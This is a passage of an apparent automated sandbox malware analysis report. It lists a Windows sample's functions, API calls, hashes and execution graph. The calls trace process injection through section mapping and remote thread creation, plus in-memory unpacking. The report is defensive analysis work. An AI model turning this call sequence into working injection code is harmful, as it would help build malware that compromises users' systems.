                                                                                                                            • Opcode ID: fecb3a8a54db844415a2e1bef71f7edeaef6dd4d7564fc295dfb03336b436737
                                                                                                                            • Instruction ID: 7df6671c20cba9c0b125a2c5dad59f0ef0fb370986baf59a5ee6412d0567cba0
                                                                                                                            • Opcode Fuzzy Hash: fecb3a8a54db844415a2e1bef71f7edeaef6dd4d7564fc295dfb03336b436737
                                                                                                                            • Instruction Fuzzy Hash: A8F0E96065D342ABDB0B0F60A9155717F5C690672732801FFE482762C5D27D0707A24F
                                                                                                                            Function 00403247 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-4112121772
                                                                                                                            • Opcode ID: 102b48951598741f63d2bc3dccd8cbc6c8ba434529aa2a86973ea2f557790a04
                                                                                                                            • Instruction ID: ca511933a5b28aa85cb858a2c4f9adc3918de21c1b1b7b18f24455f842de9805
                                                                                                                            • Opcode Fuzzy Hash: 102b48951598741f63d2bc3dccd8cbc6c8ba434529aa2a86973ea2f557790a04
                                                                                                                            • Instruction Fuzzy Hash: 30F0E2A050D282EFDB0A1F2569288317F9C6A1670733801FFD083B91C2D13E4707A25F
                                                                                                                            Function 0040326C Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-4112121772
                                                                                                                            • Opcode ID: e697506e40fc18b1e89b069197d835560c4ae47d934abc3c31fc06bf68063514
                                                                                                                            • Instruction ID: 6ca54dc93712ca672dcb2052c894f69c3c01cbab2e020e50f3e64b8dc9d16c88
                                                                                                                            • Opcode Fuzzy Hash: e697506e40fc18b1e89b069197d835560c4ae47d934abc3c31fc06bf68063514
                                                                                                                            • Instruction Fuzzy Hash: 39F0E56151D282ABDB1B4F2569550717F5C6A0770A72401FFD482B51C2E13E0717E24F
                                                                                                                            Function 00403290 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-4112121772
                                                                                                                            • Opcode ID: fb335cf0d47e54c0d4b163b58812e271318afe8484c0deefa432d84bf061ab59
                                                                                                                            • Instruction ID: b5625208c70294fe1d85df5a918749f501d715d6cf31fdde382de861c42b0134
                                                                                                                            • Opcode Fuzzy Hash: fb335cf0d47e54c0d4b163b58812e271318afe8484c0deefa432d84bf061ab59
                                                                                                                            • Instruction Fuzzy Hash: 65F02B91A1D3C15FDB631F7598191617FA86D6774931840FFD041A52D2F17E0B06D30B
                                                                                                                            Function 0040327D Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-4112121772
                                                                                                                            • Opcode ID: 0a82979ad1abcd90eb5fc18d9275e14ea313a28b34b7e2628bae92218518f56c
                                                                                                                            • Instruction ID: 3e9ee4a9669d4f407ff3dbfcbf3d4ca987626ae5d69e3fc9a3947ca81785133e
                                                                                                                            • Opcode Fuzzy Hash: 0a82979ad1abcd90eb5fc18d9275e14ea313a28b34b7e2628bae92218518f56c
                                                                                                                            • Instruction Fuzzy Hash: B2E0DFA064A6817BDB171F69AA190717F9C6A1BB0771801FFD081A92C2D17E0B16D34F
                                                                                                                            Function 005F0D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5f0000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                            • Instruction ID: 863051e66c8a79b30188aad475c6f9cf6a4493174bac05a33afdcecc6e0a7bcc
                                                                                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                            • Instruction Fuzzy Hash: C801F7726016088FDF21DF60C804BBB37E9FB85306F0944A4DB06D72C3E378A8418B80
                                                                                                                            Function 00418D50 Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418D84
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418D9F
                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418DC2
                                                                                                                            • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418DD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233107637.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_40b000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2776817195-0
                                                                                                                            • Opcode ID: f30173706c358a0a2784e69d0405cb642d2262f11b42eed8560d13ebc88a1c06
                                                                                                                            • Instruction ID: e6d39fe0092bbab876aaf39b699cc254fd154f119dceba652d6ce7d41ca7bd17
                                                                                                                            • Opcode Fuzzy Hash: f30173706c358a0a2784e69d0405cb642d2262f11b42eed8560d13ebc88a1c06
                                                                                                                            • Instruction Fuzzy Hash: CD01D870A402049BD760AFA4FC45BDA37B4E71C705F40806AF605962D0DE745988DF9A
                                                                                                                            Function 00418CD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418CE4
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418CF6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233107637.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_40b000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 2991353152-2547889144
                                                                                                                            • Opcode ID: 8d08779753d9f8bcff46eaf4c583cf6f56908dff42d916d2df929441dec03c69
                                                                                                                            • Instruction ID: 810f788c3858191b0e6f136e57086e392da7284b159ae35535647157417a7ca4
                                                                                                                            • Opcode Fuzzy Hash: 8d08779753d9f8bcff46eaf4c583cf6f56908dff42d916d2df929441dec03c69
                                                                                                                            • Instruction Fuzzy Hash: 7CF0C83150530496E7119FA5ED807EE7B69EB19320F60422EED0456281CB784D8597AA

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:10.1%
                                                                                                                            Dynamic/Decrypted Code Coverage:26.2%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:183
                                                                                                                            Total number of Limit Nodes:6
                                                                                                                            execution_graph 3297 402e40 3299 402e37 3297->3299 3300 402edf 3299->3300 3301 4018e6 3299->3301 3302 4018f5 3301->3302 3303 40192e Sleep 3302->3303 3304 401949 3303->3304 3306 40195a 3304->3306 3307 401514 3304->3307 3306->3300 3308 401524 3307->3308 3309 4015c4 NtDuplicateObject 3308->3309 3317 401896 3308->3317 3310 4015e1 NtCreateSection 3309->3310 3309->3317 3311 401661 NtCreateSection 3310->3311 3312 401607 NtMapViewOfSection 3310->3312 3314 40168d 3311->3314 3311->3317 3312->3311 3313 40162a NtMapViewOfSection 3312->3313 3313->3311 3315 401648 3313->3315 3316 401697 NtMapViewOfSection 3314->3316 3314->3317 3315->3311 3316->3317 3318 4016be NtMapViewOfSection 3316->3318 3317->3306 3318->3317 3319 4016e0 3318->3319 3321 4016e5 3319->3321 3323 4016e7 3321->3323 3322 401874 HeapCreate 3324 401896 3322->3324 3323->3322 3324->3319 3490 401542 3491 40153b 3490->3491 3492 4015c4 NtDuplicateObject 3491->3492 3500 401896 3491->3500 3493 4015e1 NtCreateSection 3492->3493 3492->3500 3494 401661 NtCreateSection 3493->3494 3495 401607 NtMapViewOfSection 3493->3495 3497 40168d 3494->3497 3494->3500 3495->3494 3496 40162a NtMapViewOfSection 3495->3496 3496->3494 3498 401648 3496->3498 3499 401697 NtMapViewOfSection 3497->3499 3497->3500 3498->3494 3499->3500 3501 4016be NtMapViewOfSection 3499->3501 3501->3500 3502 4016e0 3501->3502 3503 4016e5 HeapCreate 3502->3503 3503->3502 3552 418d06 3553 418d10 3552->3553 3554 418cc0 SetPriorityClass 3553->3554 3555 418d2d 3553->3555 3554->3553 3587 402dd0 3588 402ddc 3587->3588 3589 4018e6 9 API calls 3588->3589 3590 402edf 3588->3590 3589->3590 3325 419250 3328 418df0 3325->3328 3327 419255 3329 418dfd 3328->3329 3330 418f00 7 API calls 3329->3330 3331 419046 3329->3331 3333 418f78 7 API calls 3330->3333 3332 419054 SetCommState 3331->3332 3338 41906d 3331->3338 3332->3331 3334 419024 3333->3334 3335 419018 ObjectPrivilegeAuditAlarmW 3333->3335 3336 419035 3334->3336 3337 41902d WaitForSingleObject 3334->3337 3335->3334 3336->3331 3337->3336 3339 41912a 3338->3339 3340 41907a 9 API calls 3338->3340 3352 418ac0 LocalAlloc 3339->3352 3347 419108 3340->3347 3344 41912f LoadLibraryA 3353 418af0 GetModuleHandleW GetProcAddress VirtualProtect 3344->3353 3345 41917d 3354 418d50 3345->3354 3347->3339 3348 419182 3349 4191c3 InterlockedCompareExchange 3348->3349 3350 4191a3 MoveFileW 3348->3350 3351 4191dd 3348->3351 3349->3348 3350->3348 3351->3327 3352->3344 3353->3345 3355 418d79 QueryDosDeviceW 3354->3355 3356 418d8a 3354->3356 3355->3356 3365 418c90 3356->3365 3359 418da5 3368 418cd0 3359->3368 3360 418d9d FreeEnvironmentStringsA 3360->3359 3363 418dd7 3363->3348 3364 418dbc HeapCreate GetNumaProcessorNode 3364->3363 3366 418ca1 FatalAppExitA GetModuleHandleA 3365->3366 3367 418cb3 3365->3367 3366->3367 3367->3359 3367->3360 3369 418cec 3368->3369 3370 418cde BuildCommDCBA 3368->3370 3371 418cf4 FreeEnvironmentStringsA 3369->3371 3374 418cfc 3369->3374 3370->3374 3371->3374 3372 418d2d 3372->3363 3372->3364 3374->3372 3375 418cc0 3374->3375 3378 418c40 3375->3378 3379 418c6b 3378->3379 3380 418c5c SetPriorityClass 3378->3380 3379->3374 3380->3379 3566 401915 3567 40191a 3566->3567 3568 4018c6 3566->3568 3569 40192e Sleep 3567->3569 3570 401949 3569->3570 3571 401514 8 API calls 3570->3571 3572 40195a 3570->3572 3571->3572 3381 6b003c 3382 6b0049 3381->3382 3394 6b0e0f SetErrorMode SetErrorMode 3382->3394 3387 6b0265 3388 6b02ce VirtualProtect 3387->3388 3390 6b030b 3388->3390 3389 6b0439 VirtualFree 3393 6b04be LoadLibraryA 3389->3393 3390->3389 3392 6b08c7 3393->3392 3395 6b0223 3394->3395 3396 6b0d90 3395->3396 3397 6b0dad 3396->3397 3398 6b0dbb GetPEB 3397->3398 3399 6b0238 VirtualAlloc 3397->3399 3398->3399 3399->3387 3404 402f97 3405 4030ee 3404->3405 3406 402fc1 3404->3406 3406->3405 3407 40307c RtlCreateUserThread NtTerminateProcess 3406->3407 3407->3405 3427 6b0001 3428 6b0005 3427->3428 3433 6b092b GetPEB 3428->3433 3430 6b0030 3435 6b003c 3430->3435 3434 6b0972 3433->3434 3434->3430 3436 6b0049 3435->3436 3437 6b0e0f 2 API calls 3436->3437 3438 6b0223 3437->3438 3439 6b0d90 GetPEB 3438->3439 3440 6b0238 VirtualAlloc 3439->3440 3441 6b0265 3440->3441 3442 6b02ce VirtualProtect 3441->3442 3444 6b030b 3442->3444 3443 6b0439 VirtualFree 3447 6b04be LoadLibraryA 3443->3447 3444->3443 3446 6b08c7 3447->3446 3452 6b0005 3453 6b092b GetPEB 3452->3453 3454 6b0030 3453->3454 3455 6b003c 7 API calls 3454->3455 3456 6b0038 3455->3456 3461 4018f1 3462 4018f6 3461->3462 3463 40192e Sleep 3462->3463 3464 401949 3463->3464 3465 401514 8 API calls 3464->3465 3466 40195a 3464->3466 3465->3466 3467 4016f5 3469 4016f6 3467->3469 3468 401874 HeapCreate 3470 401896 3468->3470 3469->3468 3400 401777 3402 40177a 3400->3402 3401 401874 HeapCreate 3403 401896 3401->3403 3402->3401 3408 7e0347 3409 7e0356 3408->3409 3412 7e0ae7 3409->3412 3413 7e0b02 3412->3413 3414 7e0b0b CreateToolhelp32Snapshot 3413->3414 3415 7e0b27 Module32First 3413->3415 3414->3413 3414->3415 3416 7e035f 3415->3416 3417 7e0b36 3415->3417 3419 7e07a6 3417->3419 3420 7e07d1 3419->3420 3421 7e07e2 VirtualAlloc 3420->3421 3422 7e081a 3420->3422 3421->3422 3548 402d7b 3551 402d38 3548->3551 3549 402dc7 3550 4018e6 9 API calls 3550->3549 3551->3548 3551->3549 3551->3550 3471 4014fe 3472 401506 3471->3472 3473 401531 3471->3473 3474 4015c4 NtDuplicateObject 3473->3474 3482 401896 3473->3482 3475 4015e1 NtCreateSection 3474->3475 3474->3482 3476 401661 NtCreateSection 3475->3476 3477 401607 NtMapViewOfSection 3475->3477 3479 40168d 3476->3479 3476->3482 3477->3476 3478 40162a NtMapViewOfSection 3477->3478 3478->3476 3480 401648 3478->3480 3481 401697 NtMapViewOfSection 3479->3481 3479->3482 3480->3476 3481->3482 3483 4016be NtMapViewOfSection 3481->3483 3483->3482 3484 4016e0 3483->3484 3485 4016e5 HeapCreate 3484->3485 3485->3484

                                                                                                                            Executed Functions

                                                                                                                            Function 00418DF0 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 321filewindowlibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 418df0-418e18 2 418e20-418e27 0->2 3 418e54-418e5a 2->3 4 418e29-418e50 2->4 5 418e5c-418e68 3->5 6 418e6e-418e78 3->6 4->3 5->6 7 418eb3-418eba 6->7 8 418e7a-418ea9 6->8 7->2 9 418ec0-418ec6 7->9 8->7 11 418ec8-418ece 9->11 12 418ed0-418ed6 11->12 13 418edc-418ee6 11->13 12->13 14 418ee8 13->14 15 418eea-418ef1 13->15 14->15 15->11 16 418ef3-418efa 15->16 17 418f00-419016 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 419046-419052 16->18 21 419024-41902b 17->21 22 419018-41901e ObjectPrivilegeAuditAlarmW 17->22 19 419054-419062 SetCommState 18->19 26 419064-41906b 19->26 27 41906d-419074 19->27 24 419035-419043 21->24 25 41902d-41902f WaitForSingleObject 21->25 22->21 24->18 25->24 26->19 26->27 28 41912a-419139 call 418ac0 27->28 29 41907a-419124 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 27->29 34 41913b-41914c 28->34 35 41916d-419178 LoadLibraryA call 418af0 28->35 29->28 37 419150-419160 34->37 42 41917d-41918e call 418d50 35->42 40 419162 37->40 41 419168-41916b 37->41 40->41 41->35 41->37 46 419190-419197 42->46 48 419199-4191a7 MoveFileW 46->48 49 4191ad-4191b3 46->49 48->49 50 4191b5 call 418ae0 49->50 51 4191ba-4191c1 49->51 50->51 54 4191c3-4191ce InterlockedCompareExchange 51->54 55 4191d4-4191db 51->55 54->55 55->46 57 4191dd-4191ed 55->57 58 4191f0-419200 57->58 60 419202 58->60 61 419209-41920c 58->61 60->61 61->58 62 41920e-419219 61->62 63 419220-419225 62->63 64 419227-41922d 63->64 65 41922f-419235 63->65 64->65 66 419237-419244 64->66 65->63 65->66
                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418F0B
                                                                                                                            • GetFocus.USER32 ref: 00418F11
                                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418F1E
                                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00418F25
                                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418F3D
                                                                                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418F45
                                                                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418F5D
                                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418F84
                                                                                                                            • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418F90
                                                                                                                            • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418FA6
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00418FAC
                                                                                                                            • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418FF1
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00419000
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00419009
                                                                                                                            • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041901E
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041902F
                                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00419058
                                                                                                                            • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00419089
                                                                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 0041909D
                                                                                                                            • CopyFileW.KERNEL32(0041B3AC,0041B380,00000000), ref: 004190AE
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 004190B5
                                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 004190BB
                                                                                                                            • GetBinaryType.KERNEL32(0041B3C8,?), ref: 004190CD
                                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004190E0
                                                                                                                            • GetLongPathNameA.KERNEL32(0041B3E4,?,00000000), ref: 004190F3
                                                                                                                            • PurgeComm.KERNEL32(00000000,00000000), ref: 004190FB
                                                                                                                            • LoadLibraryA.KERNELBASE(0041B3EC), ref: 00419172
                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 004191A7
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004191CE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516656554.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_40b000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                                            • String ID: k`$}$
                                                                                                                            • API String ID: 2220722107-956986773
                                                                                                                            • Opcode ID: 76067d98ed010348569ee083334d6030e4c9192beea86e856fa9a0357b35bb33
                                                                                                                            • Instruction ID: 4ca0833080540fc1689ebbf06c0baecda7ebd0e2289d1b61a46df4a83d3cd1a5
                                                                                                                            • Opcode Fuzzy Hash: 76067d98ed010348569ee083334d6030e4c9192beea86e856fa9a0357b35bb33
                                                                                                                            • Instruction Fuzzy Hash: F9B1B371902124ABDB219FA1EC48EDF7B79EF4D750F00806AF649A2151C7781AC5CFAE
                                                                                                                            Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 153 401514-401533 155 401524-40152f 153->155 156 401536-40156e call 401193 153->156 155->156 165 401570 156->165 166 401573-401578 156->166 165->166 168 401898-4018a0 166->168 169 40157e-40158f 166->169 168->166 172 4018a5-4018b7 168->172 173 401595-4015be 169->173 174 401896 169->174 180 4018c5 172->180 181 4018bc-4018e3 call 401193 172->181 173->174 182 4015c4-4015db NtDuplicateObject 173->182 174->172 180->181 182->174 184 4015e1-401605 NtCreateSection 182->184 186 401661-401687 NtCreateSection 184->186 187 401607-401628 NtMapViewOfSection 184->187 186->174 190 40168d-401691 186->190 187->186 189 40162a-401646 NtMapViewOfSection 187->189 189->186 192 401648-40165e 189->192 190->174 193 401697-4016b8 NtMapViewOfSection 190->193 192->186 193->174 196 4016be-4016da NtMapViewOfSection 193->196 196->174 198 4016e0 call 4016e5 196->198
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                            • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                            • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                            • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                                                                                                            Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 200 4014fe-401503 201 401531-40156e call 401193 200->201 202 401506-401511 200->202 212 401570 201->212 213 401573-401578 201->213 212->213 215 401898-4018a0 213->215 216 40157e-40158f 213->216 215->213 219 4018a5-4018b7 215->219 220 401595-4015be 216->220 221 401896 216->221 227 4018c5 219->227 228 4018bc-4018e3 call 401193 219->228 220->221 229 4015c4-4015db NtDuplicateObject 220->229 221->219 227->228 229->221 231 4015e1-401605 NtCreateSection 229->231 233 401661-401687 NtCreateSection 231->233 234 401607-401628 NtMapViewOfSection 231->234 233->221 237 40168d-401691 233->237 234->233 236 40162a-401646 NtMapViewOfSection 234->236 236->233 239 401648-40165e 236->239 237->221 240 401697-4016b8 NtMapViewOfSection 237->240 239->233 240->221 243 4016be-4016da NtMapViewOfSection 240->243 243->221 245 4016e0 call 4016e5 243->245
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1652636561-0
                                                                                                                            • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                            • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                            • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                            • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                                                                                                            Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 247 401542-40156e call 401193 256 401570 247->256 257 401573-401578 247->257 256->257 259 401898-4018a0 257->259 260 40157e-40158f 257->260 259->257 263 4018a5-4018b7 259->263 264 401595-4015be 260->264 265 401896 260->265 271 4018c5 263->271 272 4018bc-4018e3 call 401193 263->272 264->265 273 4015c4-4015db NtDuplicateObject 264->273 265->263 271->272 273->265 275 4015e1-401605 NtCreateSection 273->275 277 401661-401687 NtCreateSection 275->277 278 401607-401628 NtMapViewOfSection 275->278 277->265 281 40168d-401691 277->281 278->277 280 40162a-401646 NtMapViewOfSection 278->280 280->277 283 401648-40165e 280->283 281->265 284 401697-4016b8 NtMapViewOfSection 281->284 283->277 284->265 287 4016be-4016da NtMapViewOfSection 284->287 287->265 289 4016e0 call 4016e5 287->289
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
